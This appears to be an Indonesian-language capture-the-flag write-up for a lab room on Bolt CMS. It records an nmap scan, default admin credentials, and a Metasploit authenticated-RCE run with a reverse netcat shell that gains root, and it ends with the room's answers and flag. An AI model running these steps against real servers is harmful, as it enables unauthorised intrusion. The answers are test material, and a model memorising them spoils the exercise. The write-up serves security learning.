Seorang pahlawan dilepaskan
Ruangan ini dirancang bagi pengguna untuk membiasakan diri dengan Bolt CMS dan bagaimana ia dapat dieksploitasi menggunakan Eksekusi Kode Jarak Jauh yang Diautentikasi. Anda harus menunggu setidaknya 3-4 menit agar mesin menyala dengan benar.
Start the machine
Seorang pahlawan dilepaskan
Setelah Anda berhasil menerapkan VM, hitung sebelum menemukan flag di mesin.
What port number has a web server with a CMS running?
┌─[cyber@cyber]─[~]
└──╼ $sudo nmap -sC -sV -T5 -Pn -vv 10.10.93.20
[sudo] password for cyber:
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-03-16 03:33 WIT
NSE: Loaded 153 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 03:33
Completed NSE at 03:33, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 03:33
Completed NSE at 03:33, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 03:33
Completed NSE at 03:33, 0.00s elapsed
Initiating Parallel DNS resolution of 1 host. at 03:33
Completed Parallel DNS resolution of 1 host. at 03:33, 0.07s elapsed
Initiating SYN Stealth Scan at 03:33
Scanning 10.10.99.51 [1000 ports]
Discovered open port 80/tcp on 10.10.99.51
Discovered open port 8000/tcp on 10.10.99.51
Discovered open port 22/tcp on 10.10.99.51
Increasing send delay for 10.10.99.51 from 0 to 5 due to 124 out of 309 dropped probes since last increase.
Warning: 10.10.99.51 giving up on port because retransmission cap hit (2).
Completed SYN Stealth Scan at 03:33, 19.75s elapsed (1000 total ports)
Initiating Service scan at 03:33
Scanning 3 services on 10.10.99.51
Warning: Hit PCRE_ERROR_MATCHLIMIT when probing for service http with the regex '^HTTP/1.0 404 Not Found
(?:[^<]+|<(?!/head>))*?<style>
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
</style>'
Warning: Hit PCRE_ERROR_MATCHLIMIT when probing for service http with the regex '^HTTP/1.0 404 Not Found
(?:[^<]+|<(?!/head>))*?<style>
body { background-color: #ffffff; color: #000000; }
h1 { font-family: sans-serif; font-size: 150%; background-color: #9999cc; font-weight: bold; color: #000000; margin-top: 0;}
</style>'
Completed Service scan at 03:34, 32.80s elapsed (3 services on 1 host)
NSE: Script scanning 10.10.99.51.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 03:34
Completed NSE at 03:34, 14.72s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 03:34
Completed NSE at 03:34, 1.95s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 03:34
Completed NSE at 03:34, 0.00s elapsed
Nmap scan report for 10.10.99.51
Host is up, received user-set (0.48s latency).
Scanned at 2021-03-16 03:33:39 WIT for 70s
Not shown: 770 closed ports, 227 filtered ports
Reason: 770 resets and 227 no-responses
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 63 OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 f3:85:ec:54:f2:01:b1:94:40:de:42:e8:21:97:20:80 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDaKxKph/4I3YG+2GjzPjOevcQldxrIll8wZ8SZyy2fMg3S5tl5G6PBFbF9GvlLt1X/gadOlBc99EG3hGxvAyoujfdSuXfxVznPcVuy0acAahC0ohdGp3fZaPGJMl7lW0wkPTHO19DtSsVPniBFdrWEq9vfSODxqdot8ij2PnEWfnCsj2Vf8hI8TRUBcPcQK12IsAbvBOcXOEZoxof/IQU/rSeiuYCvtQaJh+gmL7xTfDmX1Uh2+oK6yfCn87RpN2kDp3YpEHVRJ4NFNPe8lgQzekGCq0GUZxjUfFg1JNSWe1DdvnaWnz8J8dTbVZiyNG3NAVAwP1+iFARVOkiH1hi1
| 256 77:c7:c1:ae:31:41:21:e4:93:0e:9a:dd:0b:29:e1:ff (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBE52sV7veXSHXpLFmu5lrkk8HhYX2kgEtphT3g7qc1tfqX4O6gk5IlBUH25VUUHOhB5BaujcoBeId/pMh4JLpCs=
| 256 07:05:43:46:9d:b2:3e:f0:4d:69:67:e4:91:d3:d3:7f (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAINZwq5mZftBwFP7wDFt5kinK8mM+Gk2MaPebZ4I0ukZ+
80/tcp open http syn-ack ttl 63 Apache httpd 2.4.29 ((Ubuntu))
| http-methods:
|_ Supported Methods: GET POST OPTIONS HEAD
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
8000/tcp open http syn-ack ttl 63 (PHP 7.2.32-1)
| fingerprint-strings:
| FourOhFourRequest:
| HTTP/1.0 404 Not Found
| Date: Mon, 15 Mar 2021 18:34:13 GMT
| Connection: close
| X-Powered-By: PHP/7.2.32-1+ubuntu18.04.1+deb.sury.org+1
| Cache-Control: private, must-revalidate
| Date: Mon, 15 Mar 2021 18:34:13 GMT
| Content-Type: text/html; charset=UTF-8
| pragma: no-cache
| expires: -1
| X-Debug-Token: 587eb4
| <!doctype html>
| <html lang="en">
| <head>
| <meta charset="utf-8">
| <meta name="viewport" content="width=device-width, initial-scale=1.0">
| <title>Bolt | A hero is unleashed</title>
| <link href="https://fonts.googleapis.com/css?family=Bitter|Roboto:400,400i,700" rel="stylesheet">
| <link rel="stylesheet" href="/theme/base-2018/css/bulma.css?8ca0842ebb">
| <link rel="stylesheet" href="/theme/base-2018/css/theme.css?6cb66bfe9f">
| <meta name="generator" content="Bolt">
| </head>
| <body>
| href="#main-content" class="vis
| GetRequest:
| HTTP/1.0 200 OK
| Date: Mon, 15 Mar 2021 18:34:12 GMT
| Connection: close
| X-Powered-By: PHP/7.2.32-1+ubuntu18.04.1+deb.sury.org+1
| Cache-Control: public, s-maxage=600
| Date: Mon, 15 Mar 2021 18:34:12 GMT
| Content-Type: text/html; charset=UTF-8
| <meta name="viewport" content="width=device-width, initial-scale=1.0">
| <title>Bolt | A hero is unleashed</title>
| <link href="https://fonts.googleapis.com/css?family=Bitter|Roboto:400,400i,700" rel="stylesheet">
| <link rel="stylesheet" href="/theme/base-2018/css/bulma.css?8ca0842ebb">
| <link rel="stylesheet" href="/theme/base-2018/css/theme.css?6cb66bfe9f">
| <meta name="generator" content="Bolt">
| <link rel="canonical" href="http://0.0.0.0:8000/">
| </head>
|_ <body class="front">
|_http-generator: Bolt
| http-methods:
|_ Supported Methods: GET HEAD POST
|_http-open-proxy: Proxy might be redirecting requests
|_http-title: Bolt | A hero is unleashed
Answare = 8000
Apa nama pengguna yang dapat kita temukan di CMS?
|_http-generator: Bolt | http-methods: |_ Supported Methods: GET HEAD POST
Answare = Bolt
Apa kata sandi yang dapat kami temukan untuk nama pengguna?
Answare = boltadmin123
Versi CMS apa yang diinstal di server? (Mis: Nama 1.1.1)
lalu klik login
Answare = Bolt 3.7.1
Ada eksploitasi untuk versi sebelumnya dari CMS ini, yang memungkinkan RCE terautentikasi. Temukan di Exploit DB. Apa EDB-ID-nya?
Answare = 48296
Metasploit baru-baru ini menambahkan modul exploit untuk kerentanan ini. Apa jalur lengkap untuk eksploitasi ini? (Mis: mengeksploitasi / ....)
Catatan: Jika Anda tidak dapat menemukan modul exploit, kemungkinan besar karena metasploit Anda tidak diperbarui. Jalankan `apt update` lalu` apt install metasploit-framework`
┌─[✗]─[cyber@cyber]─[~]
└──╼ $sudo msfconsole
msf6 > search bolt 3.7.1
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/unix/webapp/bolt_authenticated_rce 2020-05-07 excellent Yes Bolt CMS 3.7.0 - Authenticated Remote Code Execution
Interact with a module by name or index. For example info 0, use 0 or use exploit/unix/webapp/bolt_authenticated_rce
msf6 >
Answare = exploit/unix/webapp/bolt_authenticated_rce
Setel LHOST, LPORT, RHOST, USERNAME, PASSWORD di msfconsole sebelum menjalankan exploit
Sebelum set
msf6 exploit(unix/webapp/bolt_authenticated_rce) > options
Module options (exploit/unix/webapp/bolt_authenticated_rce):
Name Current Setting Required Description
---- --------------- -------- -----------
FILE_TRAVERSAL_PATH ../../../public/files yes Traversal path from "/files" on the web server to "/root" on the server
PASSWORD yes Password to authenticate with
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 8000 yes The target port (TCP)
SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL/TLS for outgoing connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
TARGETURI / yes Base path to Bolt CMS
URIPATH no The URI to use for this exploit (default is random)
USERNAME yes Username to authenticate with
VHOST no HTTP server virtual host
Payload options (cmd/unix/reverse_netcat):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
2 Linux (cmd)
set
msf6 exploit(unix/webapp/bolt_authenticated_rce) > set RHOSTS
set RHOSTS
msf6 exploit(unix/webapp/bolt_authenticated_rce) > set RHOSTS 10.10.93.20
RHOSTS => 10.10.93.20
msf6 exploit(unix/webapp/bolt_authenticated_rce) > set PASSWORD boltadmin123
PASSWORD => boltadmin123
msf6 exploit(unix/webapp/bolt_authenticated_rce) > set LHOST 10.9.169.148
LHOST => 10.9.169.148
msf6 exploit(unix/webapp/bolt_authenticated_rce) > set USERNAME bolt
USERNAME => bolt
Setelah di set
msf6 exploit(unix/webapp/bolt_authenticated_rce) > options
Module options (exploit/unix/webapp/bolt_authenticated_rce):
Name Current Setting Required Description
---- --------------- -------- -----------
FILE_TRAVERSAL_PATH ../../../public/files yes Traversal path from "/files" on the web server to "/root" on the server
PASSWORD boltadmin123 yes Password to authenticate with
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS 10.10.93.20 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 8000 yes The target port (TCP)
SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL/TLS for outgoing connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
TARGETURI / yes Base path to Bolt CMS
URIPATH no The URI to use for this exploit (default is random)
USERNAME bolt yes Username to authenticate with
VHOST no HTTP server virtual host
Payload options (cmd/unix/reverse_netcat):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 10.9.169.148 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
2 Linux (cmd)
Cari flag.txt di dalam mesin.
msf6 exploit(unix/webapp/bolt_authenticated_rce) > exploit
[*] Started reverse TCP handler on 10.9.169.148:4444
[*] Executing automatic check (disable AutoCheck to override)
[+] The target is vulnerable. Successfully changed the /bolt/profile username to PHP $_GET variable "xbeku".
[*] Found 3 potential token(s) for creating .php files.
[+] Used token 1510f7ff0b1d160710c92a46c1 to create glofrwtd.php.
[*] Attempting to execute the payload via "/files/glofrwtd.php?xbeku=`payload`"
[*] Command shell session 1 opened (10.9.169.148:4444 -> 10.10.93.20:35582) at 2021-03-16 05:15:33 +0900
[!] No response, may have executed a blocking payload!
[+] Deleted file glofrwtd.php.
[+] Reverted user profile back to original state.
id
uid=0(root) gid=0(root) groups=0(root)
pwd
/home/bolt/public/files
ls
index.html
find / -type f -name 'flag.txt'
/home/flag.txt
cd /home
pwd
/home
ls
bolt
composer-setup.php
flag.txt
cat flag.txt
THM{wh0_d035nt_l0ve5_b0l7_r1gh7?}
Answare = THM{wh0_d035nt_l0ve5_b0l7_r1gh7?}